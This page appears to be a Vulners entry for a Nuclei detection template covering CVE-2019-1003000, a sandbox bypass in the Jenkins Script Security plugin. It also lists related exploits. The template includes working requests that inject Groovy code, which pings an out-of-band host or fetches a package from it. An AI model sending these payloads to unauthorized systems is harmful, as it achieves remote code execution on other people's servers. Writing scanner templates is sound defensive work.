| Reporter | Title | Published | Views | Family All 69 |
|---|---|---|---|---|
| Exploit for CVE-2019-1003000 | 24 Apr 201923:52 | – | githubexploit | |
| Exploit for CVE-2019-1003000 | 15 Feb 201905:59 | – | githubexploit | |
| Exploit for OS Command Injection in Pfsense | 26 Apr 201702:03 | – | githubexploit | |
| Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution Exploit | 25 Feb 201900:00 | – | zdt | |
| Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE Exploit | 19 Mar 201900:00 | – | zdt | |
| Exploit for CVE-2019-1003000 | 18 Jul 202023:27 | – | gitee | |
| Exploit for CVE-2019-1003000 | 31 Mar 202111:15 | – | gitee | |
| Exploit for CVE-2019-1003000 | 7 Feb 202115:45 | – | gitee | |
| Exploit for CVE-2019-1003000 | 19 Jan 202017:01 | – | gitee | |
| jenkins -- multiple vulnerabilities | 18 Jul 201800:00 | – | freebsd |
id: CVE-2019-1003000
info:
name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
author: sttlr
severity: high
description: |
A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
impact: |
Attackers with permission to submit sandboxed scripts can bypass sandbox protections and execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment and all managed systems.
remediation: |
Upgrade to Jenkins Script Security Plugin version 1.50 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-1003000
epss-score: 0.98428
epss-percentile: 0.99912
cpe: cpe:2.3:a:jenkins:script_security:*:*:*:*:*:jenkins:*:*
reference:
- https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
- http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
- https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
- https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
- https://github.com/purple-WL/Jenkins_CVE-2019-1003000
- https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
metadata:
verified: true
max-request: 6
vendor: jenkins
product: script_security
tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated,vkev,vuln
variables:
username: admin
vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
app_name: "{{rand_text_alpha(8)}}"
flow: http(1) && http(2) && (http(3) || http(4))
http:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "jenkins"
internal: true
case-insensitive: true
- raw:
- |
POST /j_acegi_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(tolower(body_2), "jenkins", "/logout")'
internal: true
- raw:
- |
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
Host: {{Hostname}}
- |
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- raw:
- |
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"
# digest: 490a0046304402207e6c4868cadc010f9886c3658d32881a4ca2093fc3a5615d64d7affcd07640e102207d5e234baf64039c939dae07a4359206b32aa1e45cddedea1242450e037e94f2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation